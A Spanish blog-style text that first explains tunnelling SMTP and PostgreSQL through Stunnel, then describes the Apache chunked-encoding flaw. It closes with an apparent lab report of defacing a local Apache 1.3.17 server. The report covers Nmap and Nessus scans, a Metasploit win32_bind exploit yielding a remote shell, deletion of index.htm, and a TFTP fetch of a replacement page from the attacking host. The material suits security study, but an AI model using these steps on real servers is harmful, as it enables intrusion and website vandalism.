El uso más común de Stunnel es para enviar datos desde un cliente local a un servidor remoto. La forma de hacer esto es iniciar el proceso cliente Stunnel localmente, bien llamándolo con un script de arranque (tal como /etc/rc.d/rc.local) o bien llamándolo directamente desde el directorio de instalación. Luego debe iniciar el proceso Stunnel remotamente en la máquina donde PostgreSQL está corriendo. Como con el cliente, usted puede querer iniciar el servidor automáticamente durante el arranque del sistema.

Tanto las ejecuciones del cliente como del servidor STunnel en un escenario de ejemplo se demuestran en los ejemplos siguientes.


EJEMPLOS

Ejemplo 1
Veamos un ejemplo completo de cómo conseguir una comunicación segura con control de acceso al puerto 25 (SMTP) de un servidor desde un PC, suponiendo que en ninguna de las máquinas tenemos software SSL, y que hemos seguido el procedimiento de la página antes mencionada para crear los certificados de servidor y de clientes:
Llevarse el fichero client.pem al PC, al directorio donde tengamos el stunnel.exe.
Ejecutar en el servidor:
stunnel -d 1999 -r 25 -p $CADIR/certs/server.pem \
-v 3 -A $CADIR/cacert.pem -a $CADIR/certs
Ejecutar en el cliente:
stunnel -c -d 25 -r servidor:1999 -p client.pem
Configurar el cliente de correo de forma que el servidor SMTP es el propio PC.

Si en el servidor queremos aceptar cualquier cliente cuyo certificado haya sido firmado por nuestra CA, la orden a ejecutar en el servidor sería:

stunnel -d 1999 -r 25 -p $CADIR/certs/server.pem \
-v 2 -A $CADIR/cacert.pem


Ejemplo 2
Ejecutar en el servidor:
[user@remote ~]$ # Este comando innicia el servidor en la máquina remota.
[user@remote ~]$ stunnel -P/tmp/ -p ~/stunnel.pem -d 9000 -r localhost:5432
Ejecutar en el cliente:
[user@local ~]$ # Este comando inicia el cliente en la máquina local.
[user@local ~]$ stunnel -P/tmp/ -c -d 5432 -r 192.168.1.2:9000

El comando de máquina remota (el primero) le dice al servidor que use /stunnel.pem como certificado para la encriptación, y que abra un proceso Stunnel como demonio. El parámetro -d 9000 provoca que el demonio escuche datos encriptados en el puerto 9000. El parámetro -r localhost:5432 le dice al proceso demonio que cuando reciba datos encriptados en su puerto de escucha (9000, en este caso), debería desencriptarlos y enviarlos a localhost en el puerto 5432 (el cual es el puerto de PostgreSQL, significando que los datos desencriptados serán enviados al servidor de bases de datos en la máquina local).

El segundo comando abre una instancia de Stunnel en la máquina cliente, en modo cliente (como dicta el flag -c), que escucha por el puerto 5432. El parámetro -r 192.168.1.2:9000 le indica al proceso que la computadora servidora está localizada en 192.168.1.2, y que está a la escucha por el puerto 9000 para paquetes encriptados.

Ambos modos requieren el flag -P /tmp/ para proporcionar una ruta temporal para el archivo PID, el cual es el archivo que almacena el ID de sistema del proceso Stunnel. No necesita especificar el nombre del archivo PID, sólo con la ruta ya es suficiente (el nombre de archivo será por defecto algo parecido a stunnel.localhost.9000.pid), aunque podría especificarlo si lo desea.

Una vez que cada uno de estos procesos Stunnel están corriendo en sus respectivas máquinas, el cliente psql puede ser apuntado al puerto 5432 en la máquina cliente. Los paquetes enviados a este puerto serán encriptados de forma transparente, enviados al puerto 9000 en la máquina servidora, desencriptados y enviados a PostgreSQL en el puerto 5432. Esto es similar al túnel SSH discutido en la sección denominada ``SSH/OpenSSH'', pero con una notable distinción: el proceso cliente Stunnel puede ser creado sin ningún tipo de autenticación en el servidor remoto.

Esta encriptación ocurre de forma completamente separada de los procedimientos normales de autentificación de PostgreSQL; en cuanto le concierne al proceso en segundo plano postmaster, los datos son enviados a través de él en texto plano, porque estos son desencriptados antes de ser reenviados al postmaster. El uso de Stunnel en conjunción con la autenticación mediante contraseña puede ser el ideal, ya que éste usa una política de restricción basada en contraseñas, y también encripta dichas contraseñas sobre la conexión de red.

Adicionalmente, como ya mencionamos, usted tiene la opción de ejecutar los dos procesos Stunnel localmente para encriptar paquetes entre dos puertos TCP/IP locales. La iniciación de ambos procesos cliente y servidor sobre la misma máquina se demuestra en el siguiente ejemplo. Usando Stunnel localmente.

[user@local ~]$ stunnel -P/tmp/ -p ~/stunnel-3.15/stunnel.pem -d 9000 -r 5432
[user@local ~]$ stunnel -P/tmp/ -c -d 5433 -r localhost:9000

El primer uso de stunnel abre el proceso servidor, y le dice al mismo que use /stunnel-3.15/stunnel.pem como archivo de certificado. También instruye al demonio para que escuche conexiones por el puerto 9000, y que envíe los datos desencriptados desde ese puerto al puerto 5432. El ejemplo usa el puerto 5432 porque el servidor PostgreSQL está corriendo con ese puerto.

El segundo uso de stunnel abre el proceso cliente Stunnel en el puerto 5433 (escogido arbitrariamente para enlazar al puerto PostgreSQL, en éste caso). Ese demonio es instruído para encriptar los datos entrantes, y para reenviarlos al proceso servidor a la escucha en la máquina localhost por el puerto 9000.

LIMITACIONES
Stunnel tiene dos opciones a la hora de decidir cómo correr en su sistema: usando inetd, o ejecutando el binario Stunnel como demonio. Esta última es la forma preferida, ya que usar inetd puede crear limitaciones en el software debido a varias cuestiones relacionadas con SSL. Estas limitaciones incluyen:
Stunnel debe ser inicializado para cada conexión por inetd
No es posible ninguna caché de sesión
inetd requiere forking (lo cual causa sobrecarga en el procesador)

VULNERABILIDADES
Las versiones previas a la 3.11 de Stunnel contienen diversas vulnerabilidades que hacen que su uso resulte inseguro. Stunnel es una herramienta que permite hacer un "forwarding" de puertos TCP/IP entre dos máquinas que lo estén ejecutando, utilizando tecnología SSL para asegurar la autenticidad, la integridad y la confidencialidad de las transmisiones. Las versiones previas a la 3.11 contienen tres vulnerabilidades:
El generador de números pseudoaleatorios contiene errores que hacen que sus valores sean predecibles, comprometiendo la calidad criptográfica de la sesión y de las claves generadas con esta herramienta.
El programa genera un fichero "pid" (donde se almacena el PID del proceso) de forma insegura, siendo vulnerable a ataques a través de enlaces simbólicos.
El uso de la función "syslog()" es incorrecto, siendo vulnerable a ataques de formato.
Se recomienda a todos los usuarios de Stunnel que actualicen a la versión 3.11 o superior cuanto antes.

CONCLUSIONES.

Con stunnel se pueden entubar (por decirlo de alguna forma) conexiones TCP de y hacia puertos arbitrarios entre un servidor y un cliente. Se puede redirigir un puerto local a uno remoto en donde está corriendo el demonio stunnel el cual a su vez redirige ese puerto a uno estándar donde está escuchando algún servicio. Me explico: Quería que las conexiones POP3 viajasen de forma segura entre el cliente y el servidor.

Diseñado para ofrecer la seguridad SSL a servidores (demonios) o clientes que no han sido programados con soporte SSL.
Se puede utilizar desde inetd o xinetd.
El uso más frecuente es para cifrar servicios como POP, IMAP, SMTP, LDAP, etc.
Junto con PPP se puede crear fácilmente una Red Privada Virtual RPV (VPN).
Se puede configurar para validar a los clientes mediante certificados.


REFERENCIAS.

http://www.sobl.org/traducciones/practical-postgres
Aplicación en bases de datos
http://www.stunnel.org/faq/
Pagina principal de Stunnel
http://www.uni-freiburg.de/rz/pc/software/stunnel/
Stunnel 3.4a packaged in a Windows Install Wizard

http://www.exim.org/pipermail/exim-users/Week-of-Mon-19991011/014751.html
Using Stunnel with Exim

http://www.onsight.com/faq/stunnel/
The original Stunnel Web FAQ (retired)

http://stunnel.mirt.net/
The official stunnel home page

http://www.rickk.com/sslwrap/
programa semejante a stunnel
http://www.ssh.com
Conectividad SSH
http://www.openssh.com
Conectividad SSH Libre
http://www.openssl.org
Conectividad SSH Libre

miércoles, 6 de febrero de 2008

WEBDEFECEMENT


Introducción

Apache es el servidor web más popular del mundo, con más del 68% de cuota de mercado. Se trata de un proyecto de Código Abierto, con versiones disponibles para casi cualquier sistema operativo imaginable.

Apache es un servidor HTTP de código abierto, seguro, eficiente y extensible, para sistemas operativos UNIX y derivados, así como plataformas Microsoft Windows, que goza de gran popularidad, siendo la solución más empleada para servir HTTP a nivel mundial.


Descripción de la vulnerabilidad.

Las versiones de Apache previas a la 1.3.26 y 2.0.39 son susceptibles a un ataque realizado a través de cabeceras incorrectas en los "chunked data". Los "chunked data" (datos troceados) permiten enviar segmentos de datos de forma paulatina, por ejemplo, si no conocemos el tamaño final de los datos pero queremos realizar la transmisión a medida que los vamos obteniendo, en vez de esperar a tenerlos todos. Se trata de una modalidad del protocolo HTTP poco utilizada.

En este caso, la petición preparada con una cabecera 'Transfer-Encoding: chunked' y un 'Content-Length' pueden provocar que Apache remita una petición modificada con la cabecera 'Content-Length' original. En éstas condiciones, la petición maliciosa podría ir de polizón junto a la válida, siendo los posibles resultados tan peligrosos y variopintos como envenenamiento de caché, Cross Site Scripting, secuestro de sesiones y otras tipologías de ataque similares.

Las versiones de Apache previas a la 1.3.26 y 2.0.39 no gestionan adecuadamente la presencia de valores ilegales en las cabeceras "chunked data". Los efectos que esto provoca son:

a) Si el servidor es 1.3.* y está ejecutándose bajo plataformas Unix y CPU 32 bits, el ataque sólo consigue matar un proceso Apache hijo. Dado que Apache 1.3.* está diseñado para utilizar un proceso padre como monitor, y varios procesos hijos para atender las peticiones en sí, con cada proceso atendiendo una petición concreta en cada momento, este ataque simplemente obliga al proceso padre monitor a lanzar un nuevo proceso hijo. Ello supone un pequeño incremento del consumo de CPU. Se trataría, por tanto, de un ataque DoS (Denegación de Servicio), pero de baja incidencia y efectividad, dependiendo del sistema operativo.
b) Si el servidor es 1.3.*, está ejecutándose bajo plataforma UNIX y la CPU es de 64 bits, el atacante puede lograr, bajo ciertas condiciones y sistemas operativos, ejecutar código arbitrario en el sistema, con los privilegios del proceso Apache.
c) Si el servidor es 1.3.* y está ejecutándose bajo MS Windows, el atacante puede ejecutar código arbitrario en el servidor, con los privilegios del proceso Apache.
d) Si el servidor es 2.0.*, el atacante puede desencadenar un ataque DoS (Denegación de Servicio), cuya efectividad depende de la plataforma y de los detalles de configuración del servidor Apache.

La solución de esta vulnerabilidad problema pasa por la actualización de todos los demonios Apache pertenecientes a la rama 2.0.x a la versión 2.1.16, que corrige el problema. Nótese que la rama 2.1.x está en experimentación, con lo que instamos a los administradores de Apache a que repasen concienzudamente los contenidos que el proveedor ofrece en el sitio web oficial y las posibles repercusiones en cuanto a estabilidad que origine la actualización.

Exploit

La técnica fue originalmente descubierta y documentada por los analistas de Watchfire, y consiste básicamente en lanzar varias peticiones especialmente preparadas, de modo que dos dispositivos HTTP (clientes, servidores, cachés, etc.) podrían visualizar distintos tipos de peticiones. Esto permitiría que usuarios maliciosos introdujeran peticiones camufladas en un dispositivo, sin que el otro se percatara.

Tipos de exploits. Los exploits se pueden clasificar según las categorías de vulnerabilidades utilizadas:
De desbordamiento de buffer.
De condición de carrera (race condition).
De error de formato de cadena (format string bugs).
De Cross Site Scripting (XSS).
De Inyección SQL.
De Inyección de Caracteres (CRLF).
De denegación del servicio
De Inyección múltiple HTML (Múltiple HTML Injection).
De ventanas engañosas o mixtificación de ventanas (Window Spoofing).

Existen ya "exploits" que aprovechan la vulnerabilidad Chunked Encoding en los servidores Apache.

Chunked transfer-coding

HTTP/1.1 resolvio el problema de delimitacion del tamaño de mensajes mediante el Chunked transfer-coding. En esta caso el emisor rompe el mensaje en varios pedazos (chunks) de tamaño arbitrario. Si el servidor utiliza codificación Chunked, debe de colocar un encabezado de codificación de transferencia como "chunked".

Su contenido puede realizar el rompimiento del paquete principales en varios de tamaño determinado y menor al principal, los cuales llama paquetes Chunk, cada uno de los cuales tiene prearreglado su tamaño en bytes. Por ejemplo un tamaño de 0 bytes corresponde el fin de una respuesta de mensaje.

Chunked encoding es util cuando una gran cantidad de datos son enviadas al cliente, por lo que si se envía en un solo paquete, la respuesta del cliente no sera conocida por el serivdor hasta sea completamente procesado el paquete. Por ejemplo el envio de de resultados de un Query de una base de datos a una tabla.
Si se realiza de esta forma el encabezado Content-Length debe ser programado para que envie el resultado antes de calcular el contenido o tamaño del paquete enviado.

Sin embargo con Chunked encoding esto se realiza de una forma mas sencilla, ya que una vez que se ha terminado de enviar la query se envia un paquete chunk con tamaño cero, para identificar el fin del query.

Este mecanismo permite no saturar el buffer, por lo mejoran el desempeño del servidor y aumentan su velocidad de transmisión.

¿En qué consiste la vulnerabilidad?
El Chunked Encoding es diseñado para facilitar la fragmentación de peticiones del protocolo HTTP. El Apache no puede calcular correctamente el tamaño del buffer requerido.


Reporte de Hackeo a un Servidor Web

A continuación se reporta el desarrollo de los pasos del hackeo.

Se utilizaron las siguientes herramientas de software para lograr nuestro objetivo:

Nmap. Para el escaneo de puertos y el de vulnerabilidades del servidor.
Nessus Para el escaneo de vulnerabilidades del servidor
Metasploit Framework 2.6. Como herramienta de hackeo.
Servidor TFTP ServerPro 2000.
Apache 1.3.17. Como servidor.
Windows XP (con service pack2). En el Sistema operativo de ambas máquinas.


Metodologia de Webdefecement utilizada

Paso # 1
Instalar el servidor Apache 1.2.17, desarrollar y montar el sitio web. Se selecciona esta versión por tener conocimiento de sus vulnerabilidades que son parte esencial para poder tener éxito en el ataque. El servidor tiene la direccion IP 192.168.1.18.



Paso # 2
Una vez que corre el servidor víctima la página principal la podemos observar desde nuestro equipo, conectandonos al servidor desde Internet Explorer.




Paso # 3
Ejecutamos el programa NMAP, con la finalidad de conocer cuál es el puerto activo para atacar, el cual por defecto en el Apache es el 80.





Paso # 4
Se ejecuta el Nessus a fin de conocer y verificar la vulnerabilidad. Al termino presenta un informe de vulnerabilidades de el servidor.


Ya que obtenemos el puerto que servirá de víctima, realizamos el escaneo de vulnerabilidades desde el host que realizara el ataque. Identificamos el tipo de servidor que se encuentra corriendo y la versión. Identificando la vulnerabilidad y el puerto abierto.

Paso # 5
Una vez detectada la vulnerabilidad: Apache Chunked-Encoding Memory Corruption Vulnerability, utilizamos el Metasploit el cual cumple con las características para atacar esa vulnerabilidad.



Ingresamos los parámetros necesarios para realizar el ataque en al herramienta de Metasploit, como el puerto y la IP, son obtenidos del escaneador de puertos.

Los parámetros que debemos teclear en el Metasploit son:
LHOST xxx.xxx.xxx.xxx
RHOST xxx.xxx.xxx.xxx
LPORT xxxx
RPORT xx
PAYLOAD win32_bind
TARGET apache_chunked_win32(win32_bind)


Una vez ingresados los parametros, iniciamos el exploit.

[*] Starting Bind Handler.
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/6 ]
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/2 ]
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/0 ]
[*] Got connection from 192.168.1.65 <-> 192.168.1.18


Damos un clic en session 1, y nos abre otra ventana con la consola.

Paso # 6
El Metasploit se conecta a la consola del servidor y nos permite hacer el hackeo. Para lo cual se eliminó el sito web del servidor para ocasionar que a los clientes les marque un error al abrir la página o al actualizarla.

En la consola de MS-DOS del servidor remoto, inicia en la ruta donde se encuentra el servidor Aapache, debido a que este servicio provoco la falla.


Microsoft Windows XP [Versi¢n 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.
C:\Archivos de programa\Apache Group\Apache>


Una vez en la consola nos dirijimos al directorio htdocs, donde se encuentran las paginas que aloja el servidor Apache, y verificamos con una instruccin dir su contenido y verificar cual es la pagina principal del servidor.

C:\Archivos de programa\Apache Group\Apache

>>>cd htdocs

C:\Archivos de programa\Apache Group\Apache\htdocs

>>> dir


El numero de serie del volumen es: 24D1-44C2

Directorio de C:\Archivos de programa\ApacheGroup\Apache\htdocs

21/09/2007 08:15 a.m. .
21/09/2007 08:15 a.m. ..
23/08/2004 03:14 p.m. 5,663 ! Read Me !.txt0
7/09/2007 11:57 a.m. animaciones
07/09/2007 11:57 a.m. CIENCIA
07/09/2007 11:56 a.m. cultura
07/09/2007 11:56 a.m. deportes
07/09/2007 11:55 a.m. efemerides
07/09/2007 11:54 a.m. EJEMEX
07/09/2007 11:53 a.m. Fonts
07/09/2007 11:53 a.m. HUMOR
12/09/2007 02:49 p.m. IMAGENES
07/09/2007 11:52 a.m. Images
10/09/2007 01:40 p.m. 17,526 index.htm
04/09/2007 01:14 a.m. manual
07/09/2007 12:02 p.m. MURAL
07/09/2007 11:52 a.m. Photoshop PSD Files
07/09/2007 12:02 p.m. respaldos
07/09/2007 11:52 a.m. tips
07/09/2007 11:52 a.m. _notes
2 archivos 23,189 bytes
18 dirs 3,924,934,656 bytes libres


En este caso se distingue por su tamaño que la página principal es: index.htm.
Para primeramente negar este servicio, borramos la pagina principal (index.htm), inclusive se pueden borrar el resto de carpetas, verificando se haya borrado.

C:\Archivos de programa\Apache Group\Apache\htdocs

>>> del index.htm

del index.htm

C:\Archivos de programa\Apache Group\Apache\htdocs

>>> del index.htm

del index.htm

No se encuentra

C:\Archivos de programa\Apache Group\Apache\htdocs\index.htm

Para poder confirmar que la página ha sido hackeada, se debe recargar la página para que nos muestre el mensaje de que "no puede encontrar la pagina solicitada".

Paso # 7
El siguiente paso es poner otra pagina, sustituir por una pagina que puede realizar las acciones o procesos que nosotros hayamos programado en la pagina.

Para lo cual necesitamos instalar e iniciar un servidor de TFTP y conectarnos a nuestro equipo enviando al equipo hacheado los archivos que sean necesarios para realizar el ataque.

La conexión se realiza mediante las instrucciones siguientes:
C:\Archivos de programa\Apache Group\Apache\htdocs
>>> tftp 192.168.1.65 get index.htm tftp 192.168.1.65 get index.htm
Transferencia terminada: 648 bytes en 1 segundo, 648 bytes/s

Se debe tener en consideración que es recomendable poner la otra pagina con el mismo nombre que tenia la original de lo contrario modificar el archivo de configuración del servidor Apache y cambiar el nombre de la pagina de inicio.

En la pantalla del servidor TFTP se puede verificar los archivos que se enviaron al equipo atacado.



Paso # 8

Ya copiada nuestra pagina en el servidor Apache solo resta realizar la prueba de conexión al servidor y verificar que pagina abre.





Conclusiones

Como pudimos ver la seguridad de un servidor es vulnerable si no se realizan las actualizaciones pertinentes por parte del soporte técnico de los proveedores del softwares y utilizar cualquier herramienta que haga más segura la publicación en Web como detectores de Intrusos y Firewalls.





Bibliografía

http://www.apsis.ch/pound/pound_list/archive/2005/2005-09/1127207369000

http://httpd.apache.org/info/security_bulletin_20020617.txt